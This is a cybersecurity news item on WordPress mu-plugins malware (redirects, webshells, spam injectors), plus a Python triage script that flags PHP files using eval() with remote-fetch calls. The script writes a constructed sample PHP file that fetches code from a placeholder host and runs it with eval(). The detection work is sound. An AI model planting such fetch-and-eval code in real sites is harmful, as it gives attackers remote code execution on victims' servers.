Recent discoveries have uncovered a concerning trend where threat actors are strategically concealing malicious code within WordPress websites' mu-plugins directory. The attacks target the mu-plugins folder with multiple malware types that appear legitimate but contain malicious code. These include redirect scripts that send unsuspecting visitors to harmful domains, webshells that provide attackers with remote code execution capabilities, and spam injectors that manipulate website content to distribute unwanted material.

Sucuri researchers detected that these malware variants are carefully designed to avoid detection by excluding search engine crawlers and privileged users from seeing malicious behavior. Their analysis revealed that the attackers are employing increasingly sophisticated techniques to ensure their malware remains hidden while maximizing its impact on targeted websites. The malware variants discovered employ sophisticated techniques to maintain persistence while executing harmful functions ranging from user redirection to complete website takeovers.

The most damaging variant allows attackers to establish persistent access to the compromised website, creating a foundation for long-term exploitation. Once established, this backdoor grants attackers the ability to upload files, delete content, and access sensitive information, turning the compromised website into a platform for launching further attacks against visitors and connected systems. Websites infected with these malicious scripts suffer from multiple consequences, including reputation damage, potential data theft, malware distribution to visitors, and unauthorized website modifications.

The malware uses PHP's eval() function to execute arbitrary code fetched from a remote server.
The approach allows attackers to run commands with the same privileges as the web server, potentially leading to complete website compromise.
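
A triage check for the pattern described above, added here as an example and not taken from the Sucuri report: it walks a mu-plugins directory and flags PHP files that call eval(), call a content-fetching function, or both. The regexes, indicator labels, file names and sample file contents are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic patterns chosen for this example (not signatures from the report).
EVAL_RE = re.compile(r"\beval\s*\(", re.IGNORECASE)
FETCH_RE = re.compile(
    r"\b(?:file_get_contents|curl_exec|wp_remote_get|fsockopen)\s*\(",
    re.IGNORECASE,
)

def indicators(php_source):
    """Return the heuristic indicators present in one PHP source string."""
    hits = []
    if EVAL_RE.search(php_source):
        hits.append("eval")
    if FETCH_RE.search(php_source):
        hits.append("fetch-call")
    if len(hits) == 2:
        hits.append("eval-with-fetch")  # review these files first
    return hits

def scan_mu_plugins(mu_dir):
    """Map each flagged PHP file (path relative to mu_dir) to its indicators."""
    root = Path(mu_dir)
    report = {}
    for path in sorted(root.rglob("*.php")):
        hits = indicators(path.read_text(errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Scan a constructed mu-plugins tree and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        mu = Path(tmp) / "wp-content" / "mu-plugins"
        mu.mkdir(parents=True)
        # Constructed benign must-use plugin.
        (mu / "site-tweaks.php").write_text(
            "<?php\nadd_filter('show_admin_bar', '__return_false');\n")
        # Constructed sample of the described pattern: fetch, then eval.
        (mu / "index.php").write_text(
            "<?php\n$c = file_get_contents('https://example.invalid/p.txt');\n"
            "eval($c);\n")
        return scan_mu_plugins(mu)

if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits)
```

A match is a prompt for manual review, not a verdict: legitimate plugins also call these functions, and obfuscated code can evade simple pattern matching.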
This Cyber News was published on cybersecuritynews.com. Publication date: Mon, 31 Mar 2025 08:15:14 +0000